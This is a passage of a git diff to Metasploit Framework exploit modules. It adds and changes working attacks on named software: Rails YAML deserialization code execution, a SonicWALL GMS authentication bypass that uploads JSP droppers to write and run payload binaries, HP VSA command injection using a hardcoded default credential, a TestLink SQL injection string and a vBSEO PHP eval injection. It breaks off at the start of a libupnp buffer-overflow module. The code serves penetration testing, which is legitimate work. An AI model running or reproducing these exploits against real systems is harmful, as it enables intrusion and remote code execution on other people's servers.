+ yaml.gsub(':', '\u003a')
+ end
+
+
+ #
+ # Create the YAML document that will be embedded into the JSON
+ #
+ def build_yaml_rails3
+
+ code = Rex::Text.encode_base64(payload.encoded)
+ yaml =
+ "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
+ "'#{Rex::Text.rand_text_alpha(rand(8)+1)};eval(%[#{code}].unpack(%[m0])[0]);' " +
+ ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n"
+ yaml.gsub(':', '\u003a')
+ end
+
+ def build_request(v)
+ case v
+ when 2; build_yaml_rails2
+ when 3; build_yaml_rails3
+ end
+ end
+
+ #
+ # Send the actual request
+ #
+ def exploit
+
+ [2, 3].each do |ver|
+ print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
+ send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => datastore['HTTP_METHOD'],
+ 'ctype' => 'application/json',
+ 'headers' => { 'X-HTTP-Method-Override' => 'get' },
+ 'data' => build_request(ver)
+ }, 25)
+ handler
+ end
+
+ end
+end
diff --git a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
index b103422ff400..e5e5311505bc 100644
--- a/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
+++ b/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb
@@ -10,7 +10,6 @@
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
- include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
@@ -47,14 +46,14 @@ def initialize(info = {})
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Jan 7 2013',
+ 'DefaultOptions' => { "PrependFork" => true },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
- OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"])
-
+ OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ])
], self.class)
register_evasion_options(
@@ -63,35 +62,12 @@ def initialize(info = {})
], self.class)
end
-
- #
- # This stub ensures that the payload runs outside of the Rails process
- # Otherwise, the session can be killed on timeout
- #
- def detached_payload_stub(code)
- %Q^
- code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first
- if RUBY_PLATFORM =~ /mswin|mingw|win32/
- inp = IO.popen("ruby", "wb") rescue nil
- if inp
- inp.write(code)
- inp.close
- end
- else
- if ! Process.fork()
- eval(code) rescue nil
- end
- end
- ^.strip.split(/\n/).map{|line| line.strip}.join("\n")
- end
-
#
# Create the YAML document that will be embedded into the XML
#
def build_yaml_rails2
- # Embed the payload with the detached stub
- code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+ code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@@ -108,8 +84,7 @@ def build_yaml_rails2
#
def build_yaml_rails3
- # Embed the payload with the detached stub
- code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) )
+ code = Rex::Text.encode_base64(payload.encoded)
yaml =
"--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" +
"'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " +
@@ -164,24 +139,17 @@ def build_request(v)
#
def exploit
- print_status("Sending Railsv3 request to #{rhost}:#{rport}...")
- res = send_request_cgi({
- 'uri' => datastore['URIPATH'] || "/",
- 'method' => datastore['HTTP_METHOD'],
- 'ctype' => 'application/xml',
- 'headers' => { 'X-HTTP-Method-Override' => 'get' },
- 'data' => build_request(3)
- }, 25)
- handler
-
- print_status("Sending Railsv2 request to #{rhost}:#{rport}...")
- res = send_request_cgi({
- 'uri' => datastore['URIPATH'] || "/",
- 'method' => datastore['HTTP_METHOD'],
- 'ctype' => 'application/xml',
- 'headers' => { 'X-HTTP-Method-Override' => 'get' },
- 'data' => build_request(2)
- }, 25)
- handler
+ [2, 3].each do |ver|
+ print_status("Sending Railsv#{ver} request to #{rhost}:#{rport}...")
+ send_request_cgi({
+ 'uri' => datastore['URIPATH'] || "/",
+ 'method' => datastore['HTTP_METHOD'],
+ 'ctype' => 'application/xml',
+ 'headers' => { 'X-HTTP-Method-Override' => 'get' },
+ 'data' => build_request(ver)
+ }, 25)
+ handler
+ end
+
end
end
diff --git a/modules/exploits/multi/http/sit_file_upload.rb b/modules/exploits/multi/http/sit_file_upload.rb
index 830202444bdc..cf46bf92d7ac 100644
--- a/modules/exploits/multi/http/sit_file_upload.rb
+++ b/modules/exploits/multi/http/sit_file_upload.rb
@@ -64,12 +64,7 @@ def initialize(info = {})
def check
- uri = normalize_uri(datastore['URI'])
- if uri[-1,1] != '/'
- uri = uri + "index.php"
- else
- uri = uri + "/index.php"
- end
+ uri = normalize_uri(datastore['URI'], "index.php")
res = send_request_raw({
'uri' => uri
@@ -91,12 +86,7 @@ def check
def retrieve_session(user, pass)
- uri = normalize_uri(datastore['URI'])
- if uri[-1,1] == "/"
- uri = uri + "login.php"
- else
- uri = uri + "/login.php"
- end
+ uri = normalize_uri(datastore['URI'], "login.php")
res = send_request_cgi({
'uri' => uri,
@@ -121,12 +111,7 @@ def retrieve_session(user, pass)
def upload_page(session, newpage, contents)
- uri = normalize_uri(datastore['URI'])
- if uri[-1,1] == "/"
- uri = uri + "ftp_upload_file.php"
- else
- uri = uri + "/ftp_upload_file.php"
- end
+ uri = normalize_uri(datastore['URI'], "ftp_upload_file.php")
boundary = rand_text_alphanumeric(6)
@@ -187,12 +172,7 @@ def retrieve_upload_dir(session)
def cmd_shell(cmdpath)
print_status("Calling payload: #{cmdpath}")
- uri = normalize_uri(datastore['URI'])
- if uri[-1,1] == "/"
- uri = uri + cmdpath
- else
- uri = uri + "/#{cmdpath}"
- end
+ uri = normalize_uri(datastore['URI'], cmdpath)
send_request_raw({
'uri' => uri
diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb
new file mode 100644
index 000000000000..397116f37a6a
--- /dev/null
+++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb
@@ -0,0 +1,285 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',
+ 'Description' => %q{
+ This module exploits a code execution flaw in SonicWALL GMS. It exploits two
+ vulnerabilities in order to get its objective. An authentication bypass in the
+ Web Administration interface allows to abuse the "appliance" application and upload
+ an arbitrary payload embedded in a JSP. The module has been tested successfully on
+ SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual
+ Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run
+ successfully while testing, shell payload have been used.
+ },
+ 'Author' =>
+ [
+ 'Nikolas Sotiriu', # Vulnerability Discovery
+ 'Julian Vilas ', # Metasploit module
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2013-1359'],
+ [ 'OSVDB', '89347' ],
+ [ 'BID', '57445' ],
+ [ 'EDB', '24204' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => [ 'win', 'linux' ],
+ 'Targets' =>
+ [
+ [ 'SonicWALL GMS 6.0 Viewpoint / Java Universal',
+ {
+ 'Arch' => ARCH_JAVA,
+ 'Platform' => 'java'
+ }
+ ],
+ [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'win'
+ }
+ ],
+ [ 'SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 17 2012'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])
+ ], self.class)
+ end
+
+
+ def install_path
+ return @install_path if @install_path
+
+ res = send_request_cgi(
+ {
+ 'uri' => normalize_uri(target_uri.path,"appliance","applianceMainPage") + "?skipSessionCheck=1",
+ 'method' => 'POST',
+ 'connection' => 'TE, close',
+ 'headers' =>
+ {
+ 'TE' => "deflate,gzip;q=0.3",
+ },
+ 'vars_post' => {
+ 'num' => '123456',
+ 'action' => 'show_diagnostics',
+ 'task' => 'search',
+ 'item' => 'application_log',
+ 'criteria' => '*.*',
+ 'width' => '500'
+ }
+ })
+
+ @install_path = nil
+ if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/
+ @install_path = $1
+ end
+
+ @install_path
+ end
+
+ def upload_file(location, filename, contents)
+ post_data = Rex::MIME::Message.new
+ post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"")
+ post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"")
+ post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"")
+ post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"")
+
+ # Work around an incompatible MIME implementation
+ data = post_data.to_s
+ data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
+
+ res = send_request_cgi(
+ {
+ 'uri' => normalize_uri(target_uri.path, "appliance","applianceMainPage") + "?skipSessionCheck=1",
+ 'method' => 'POST',
+ 'data' => data,
+ 'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+ 'headers' =>
+ {
+ 'TE' => "deflate,gzip;q=0.3",
+ },
+ 'connection' => 'TE, close'
+ })
+ register_files_for_cleanup(path_join(location, filename))
+
+ if res and res.code == 200 and res.body.empty?
+ return true
+ else
+ return false
+ end
+ end
+
+ def upload_and_run_jsp(filename, contents)
+ upload_file(path_join(install_path,"webapps","appliance"), filename, contents)
+ send_request_cgi(
+ {
+ 'uri' => normalize_uri(target_uri.path, "appliance", filename),
+ 'method' => 'GET'
+ })
+ end
+
+ def check
+ if install_path.nil?
+ return Exploit::CheckCode::Safe
+ end
+
+ if install_path.include?("\\")
+ print_status("Target looks like Windows")
+ else
+ print_status("Target looks like Linux")
+ end
+ return Exploit::CheckCode::Vulnerable
+ end
+
+ def exploit
+ @peer = "#{rhost}:#{rport}"
+
+ # Get Tomcat installation path
+ print_status("#{@peer} - Retrieving Tomcat installation path...")
+
+ if install_path.nil?
+ fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path")
+ end
+
+ print_good("#{@peer} - Tomcat installed on #{install_path}")
+
+ if target['Platform'] == "java"
+ exploit_java
+ else
+ exploit_native
+ end
+ end
+
+ def exploit_java
+ print_status("#{@peer} - Uploading WAR file")
+ app_base = rand_text_alphanumeric(4+rand(32-4))
+
+ war = payload.encoded_war({ :app_name => app_base }).to_s
+ war_filename = path_join(install_path, "webapps", "#{app_base}.war")
+
+ register_files_for_cleanup(war_filename)
+
+ dropper = jsp_drop_bin(war, war_filename)
+ dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
+
+ upload_and_run_jsp(dropper_filename, dropper)
+
+ 10.times do
+ select(nil, nil, nil, 2)
+
+ # Now make a request to trigger the newly deployed war
+ print_status("#{@peer} - Attempting to launch payload in deployed WAR...")
+ res = send_request_cgi(
+ {
+ 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+ 'method' => 'GET'
+ })
+ # Failure. The request timed out or the server went away.
+ break if res.nil?
+ # Success! Triggered the payload, should have a shell incoming
+ break if res.code == 200
+ end
+ end
+
+ def exploit_native
+ print_status("#{@peer} - Uploading executable file")
+ exe = payload.encoded_exe
+ exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))
+ if target['Platform'] == "win"
+ exe << ".exe"
+ end
+
+ register_files_for_cleanup(exe_filename)
+
+ dropper = jsp_drop_and_execute(exe, exe_filename)
+ dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp"
+
+ upload_and_run_jsp(dropper_filename, dropper)
+ end
+
+ def path_join(*paths)
+ if install_path.include?("\\")
+ path = paths.join("\\")
+ path.gsub!(%r|\\+|, "\\\\\\\\")
+ else
+ path = paths.join("/")
+ path.gsub!(%r|//+|, "/")
+ end
+
+ path
+ end
+
+ # This should probably go in a mixin
+ def jsp_drop_bin(bin_data, output_file)
+ jspraw = %Q|<%@ page import="java.io.*" %>\n|
+ jspraw << %Q|<%\n|
+ jspraw << %Q|String data = "#{Rex::Text.to_hex(bin_data, "")}";\n|
+
+ jspraw << %Q|FileOutputStream outputstream = new FileOutputStream("#{output_file}");\n|
+
+ jspraw << %Q|int numbytes = data.length();\n|
+
+ jspraw << %Q|byte[] bytes = new byte[numbytes/2];\n|
+ jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\n|
+ jspraw << %Q|{\n|
+ jspraw << %Q| char char1 = (char) data.charAt(counter);\n|
+ jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\n|
+ jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\n|
+ jspraw << %Q| comb <<= 4;\n|
+ jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\n|
+ jspraw << %Q| bytes[counter/2] = (byte)comb;\n|
+ jspraw << %Q|}\n|
+
+ jspraw << %Q|outputstream.write(bytes);\n|
+ jspraw << %Q|outputstream.close();\n|
+ jspraw << %Q|%>\n|
+
+ jspraw
+ end
+
+ def jsp_execute_command(command)
+ jspraw = %Q|<%@ page import="java.io.*" %>\n|
+ jspraw << %Q|<%\n|
+ jspraw << %Q|try {\n|
+ jspraw << %Q| Runtime.getRuntime().exec("chmod +x #{command}");\n|
+ jspraw << %Q|} catch (IOException ioe) { }\n|
+ jspraw << %Q|Runtime.getRuntime().exec("#{command}");\n|
+ jspraw << %Q|%>\n|
+
+ jspraw
+ end
+
+ def jsp_drop_and_execute(bin_data, output_file)
+ jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)
+ end
+
+end
diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb
index f53da514dda0..4bf8cc5abdef 100644
--- a/modules/exploits/multi/http/splunk_upload_app_exec.rb
+++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb
@@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
diff --git a/modules/exploits/multi/http/struts_code_exec.rb b/modules/exploits/multi/http/struts_code_exec.rb
index 1c4bfc9e070f..1ff03167083a 100644
--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
- Rank = ExcellentRanking
+ Rank = GoodRanking
include Msf::Exploit::CmdStagerTFTP
include Msf::Exploit::Remote::HttpClient
diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
index caa7d8b2da98..f33f57bfb14a 100644
--- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
+++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
@@ -64,7 +64,7 @@ def initialize(info = {})
]
],
'DisclosureDate' => 'Jan 06 2012',
- 'DefaultTarget' => 0))
+ 'DefaultTarget' => 2))
register_options(
[
diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb
index 28f3e0854e65..d91113a0653f 100644
--- a/modules/exploits/multi/http/testlink_upload_exec.rb
+++ b/modules/exploits/multi/http/testlink_upload_exec.rb
@@ -59,7 +59,7 @@ def initialize(info={})
def check
- base = normalize_uri(target_uri.path)
+ base = target_uri.path
base << '/' if base[-1, 1] != '/'
peer = "#{rhost}:#{rport}"
@@ -67,7 +67,7 @@ def check
begin
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{base}login.php"
+ 'uri' => normalize_uri(base, "login.php")
})
return Exploit::CheckCode::Unknown if res.nil?
@@ -185,7 +185,7 @@ def exploit
begin
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{base}lib/attachments/attachmentupload.php?id=#{id}&tableName=#{table}",
+ 'uri' => normalize_uri(base, "lib/attachments/attachmentupload.php") + "?id=#{id}&tableName=#{table}",
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200
@@ -221,7 +221,7 @@ def exploit
begin
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{base}upload_area/#{table}/#{id}/"
+ 'uri' => normalize_uri(base, "upload_area", table, id)
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@token = $1
@@ -238,11 +238,11 @@ def exploit
# attempt to retrieve real file name from the database
if @token.nil?
print_status("#{@peer} - Retrieving real file name from the database.")
- sqli = "lib/ajax/gettprojectnodes.php?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
+ sqli = normalize_uri(base, "lib/ajax/gettprojectnodes.php") + "?root_node=-1+union+select+file_path,2,3,4,5,6+FROM+attachments+WHERE+file_name='#{fname}'--"
begin
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{base}#{sqli}",
+ 'uri' => sqli,
'cookie' => datastore['COOKIE'],
})
if res and res.code == 200 and res.body =~ /\b([a-f0-9]+)\.php/
@@ -263,7 +263,7 @@ def exploit
begin
send_request_cgi({
'method' => 'GET',
- 'uri' => "#{base}upload_area/nodes_hierarchy/#{id}/#{@token}.php"
+ 'uri' => normalize_uri(base, "upload_area", "nodes_hierarchy", id, "#{@token}.php")
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_error("#{@peer} - Connection failed")
diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index 5fdf162a99c1..a46cd2c033f5 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -198,7 +198,7 @@ def exploit
#
# UPLOAD
#
- path_tmp = normalize_uri(datastore['PATH']) + "/deploy" + query_str
+ path_tmp = normalize_uri(datastore['PATH'], "deploy") + query_str
print_status("Uploading #{war.length} bytes as #{app_base}.war ...")
res = send_request_cgi({
'uri' => path_tmp,
@@ -247,7 +247,7 @@ def exploit
#
# DELETE
#
- path_tmp = normalize_uri(datastore['PATH']) + "/undeploy" + query_str
+ path_tmp = normalize_uri(datastore['PATH'], "/undeploy") + query_str
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'uri' => path_tmp,
@@ -263,7 +263,7 @@ def exploit
end
def query_serverinfo()
- path = normalize_uri(datastore['PATH']) + '/serverinfo'
+ path = normalize_uri(datastore['PATH'], '/serverinfo')
res = send_request_raw(
{
'uri' => path
diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb
index 54565c898e8e..ca61aeed054a 100644
--- a/modules/exploits/multi/http/traq_plugin_exec.rb
+++ b/modules/exploits/multi/http/traq_plugin_exec.rb
@@ -58,8 +58,7 @@ def initialize(info={})
end
def check
- uri = normalize_uri(datastore['URI'])
- uri += (uri[-1, 1] == "/") ? "admincp/login.php" : "/admincp/login.php"
+ uri = normalize_uri(datastore['URI'], "admincp", "login.php")
res = send_request_raw(
{
@@ -75,8 +74,7 @@ def check
def exploit
p = Rex::Text.encode_base64(payload.encoded)
- uri = normalize_uri(datastore['URI'])
- uri += (uri[-1, 1] == "/") ? "admincp/plugins.php?newhook" : "/admincp/plugins.php?newhook"
+ uri = normalize_uri(datastore['URI'], "admincp", "plugins.php") + "?newhook"
res = send_request_cgi(
{
@@ -92,8 +90,7 @@ def exploit
}
}, 25)
- uri = normalize_uri(datastore['URI'])
- uri += (uri[-1, 1] == "/") ? "index.php" : "/index.php"
+ uri = normalize_uri(datastore['URI'], "index.php")
res = send_request_cgi(
{
diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb
index 5735349a01e8..3745fe16e3ef 100644
--- a/modules/exploits/multi/http/vbseo_proc_deutf.rb
+++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb
@@ -55,9 +55,7 @@ def check
flag = rand_text_alpha(rand(10)+10)
data = "char_repl='{${print(#{flag})}}'=>"
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'vbseocp.php'
+ uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => "POST",
@@ -82,9 +80,7 @@ def exploit
data = "char_repl='{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'vbseocp.php'
+ uri = normalize_uri(datastore['URI'], 'vbseocp.php')
response = send_request_cgi({
'method' => 'POST',
diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb
index f4ba74ac4203..e93870a0bf72 100644
--- a/modules/exploits/multi/http/webpagetest_upload_exec.rb
+++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb
@@ -63,8 +63,8 @@ def check
uri << '/' if uri[-1,1] != '/'
base = File.dirname("#{uri}.")
- res1 = send_request_raw({'uri'=>"#{base}/index.php"})
- res2 = send_request_raw({'uri'=>"#{base}/work/resultimage.php"})
+ res1 = send_request_raw({'uri'=>normalize_uri("#{base}/index.php")})
+ res2 = send_request_raw({'uri'=>normalize_uri("#{base}/work/resultimage.php")})
if res1 and res1.body =~ /WebPagetest \- Website Performance and Optimization Test/ and
res2 and res2.code == 200
@@ -111,7 +111,7 @@ def exploit
print_status("#{peer} - Uploading payload (#{p.length.to_s} bytes)...")
res = send_request_cgi({
'method' => 'POST',
- 'uri' => "#{base}/work/resultimage.php",
+ 'uri' => normalize_uri("#{base}/work/resultimage.php"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
@@ -121,7 +121,7 @@ def exploit
return
end
- @target_path = "#{base}/results/#{fname}"
+ @target_path = normalize_uri("#{base}/results/#{fname}")
print_status("#{peer} - Requesting #{@target_path}")
res = send_request_cgi({'uri'=>@target_path})
diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb
index f2c8d8de11e4..000336b98be8 100644
--- a/modules/exploits/multi/http/wikka_spam_exec.rb
+++ b/modules/exploits/multi/http/wikka_spam_exec.rb
@@ -87,7 +87,7 @@ def check
def get_cookie
res = send_request_raw({
'method' => 'GET',
- 'uri' => "#{@base}wikka.php"
+ 'uri' => normalize_uri(@base, "wikka.php")
})
# Get the cookie in this format:
@@ -107,7 +107,7 @@ def get_cookie
#
def login(cookie)
# Send a request to the login page so we can obtain some hidden values needed for login
- uri = "#{@base}wikka.php?wakka=UserSettings"
+ uri = normalize_uri(@base, "wikka.php") + "?wakka=UserSettings"
res = send_request_raw({
'method' => 'GET',
'uri' => uri,
@@ -163,7 +163,7 @@ def inject_exec(cookie)
# Get the necessary fields in order to post a comment
res = send_request_raw({
'method' => 'GET',
- 'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}&show_comments=1",
+ 'uri' => normalize_uri(@base, "wikka.php") + "?wakka=#{datastore['PAGE']}&show_comments=1",
'cookie' => cookie
})
@@ -189,11 +189,11 @@ def inject_exec(cookie)
# Inject payload
b64_payload = Rex::Text.encode_base64(payload.encoded)
port = (rport.to_i == 80) ? "" : ":#{rport}"
- uri = "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment"
+ uri = normalize_uri("#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment")
post_data = ""
send_request_cgi({
'method' => 'POST',
- 'uri' => "#{@base}wikka.php?wakka=#{datastore['PAGE']}/addcomment",
+ 'uri' => uri,
'cookie' => cookie,
'headers' => { 'Referer' => "http://#{rhost}:#{port}/#{uri}" },
'vars_post' => fields,
@@ -202,7 +202,7 @@ def inject_exec(cookie)
send_request_raw({
'method' => 'GET',
- 'uri' => "#{@base}spamlog.txt.php"
+ 'uri' => normalize_uri(@base, "spamlog.txt.php")
})
end
diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb
index d9a7bbab08a1..b9aae48bdf6f 100644
--- a/modules/exploits/multi/misc/hp_vsa_exec.rb
+++ b/modules/exploits/multi/misc/hp_vsa_exec.rb
@@ -17,7 +17,7 @@ def initialize(info={})
'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",
'Description' => %q{
This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on
- versions prior to 9.5. By using a default account credential, it is possible
+ versions prior to 9.5. By using a default account credential, it is possible
to inject arbitrary commands as part of a ping request via port 13838.
},
'License' => MSF_LICENSE,
@@ -50,9 +50,11 @@ def initialize(info={})
'Arch' => ARCH_CMD,
'Targets' =>
[
- ['HP VSA prior to 9.5', {}]
+ [ 'Automatic', {} ],
+ [ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],
+ [ 'HP VSA 9', { 'Version' => '9.0.0' } ]
],
- 'Privileged' => false,
+ 'Privileged' => true,
'DisclosureDate' => "Nov 11 2011",
'DefaultTarget' => 0))
@@ -75,20 +77,53 @@ def generate_packet(data)
pkt
end
+ def get_target
+ if target.name !~ /Automatic/
+ return target
+ end
- def exploit
- connect
-
- # Login packet
- print_status("#{rhost}:#{rport} Sending login packet")
+ # Login at 8.5.0
packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")
+ print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")
+ sock.put(packet)
+ res = sock.get_once
+ vprint_status(Rex::Text.to_hex_dump(res)) if res
+ if res and res=~ /OK/ and res=~ /Login/
+ return targets[1]
+ end
+
+ # Login at 9.0.0
+ packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")
+ print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")
sock.put(packet)
res = sock.get_once
vprint_status(Rex::Text.to_hex_dump(res)) if res
+ if res and res=~ /OK/ and res =~ /Login/
+ return targets[2]
+ end
+
+ fail_with(Msf::Exploit::Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")
+ end
+
+ def exploit
+ connect
+
+ if target.name =~ /Automatic/
+ my_target = get_target
+ print_good("#{rhost}:#{rport} - Target #{my_target.name} found")
+ else
+ my_target = target
+ print_status("#{rhost}:#{rport} Sending login packet")
+ packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")
+ sock.put(packet)
+ res = sock.get_once
+ vprint_status(Rex::Text.to_hex_dump(res)) if res
+ end
# Command execution
print_status("#{rhost}:#{rport} Sending injection")
data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"
+ data << "64/5/" if my_target.name =~ /9/
packet = generate_packet(data)
sock.put(packet)
res = sock.get_once
diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb
index fb3f1693f98c..90ebfa34a7c5 100644
--- a/modules/exploits/multi/misc/pbot_exec.rb
+++ b/modules/exploits/multi/misc/pbot_exec.rb
@@ -28,7 +28,7 @@ def initialize(info = {})
[
'evilcry', # pbot analysis'
'Jay Turla', # pbot analysis
- '@bwallHatesTwits', # PoC
+ 'bwall', # aka @bwallHatesTwits, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb
new file mode 100644
index 000000000000..ac7286c9b043
--- /dev/null
+++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb
@@ -0,0 +1,349 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Portable UPnP SDK unique_service_name() Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a buffer overflow in the unique_service_name()
+ function of libupnp's SSDP processor. The libupnp library is used across
+ thousands of devices and is referred to as the Intel SDK for UPnP
+ Devices or the Portable SDK for UPnP Devices.
+
+ Due to size limitations on many devices, this exploit uses a separate TCP
+ listener to stage the real payload.
+ },
+ 'Author' => [
+ 'hdm', # Exploit dev for Supermicro IPMI
+ 'Alex Eubanks ', # Exploit dev for Supermicro IPMI
+ 'Richard Harman ' # Binaries, system info, testing for Supermicro IPMI
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2012-5958' ],
+ [ 'US-CERT-VU', '922681' ],
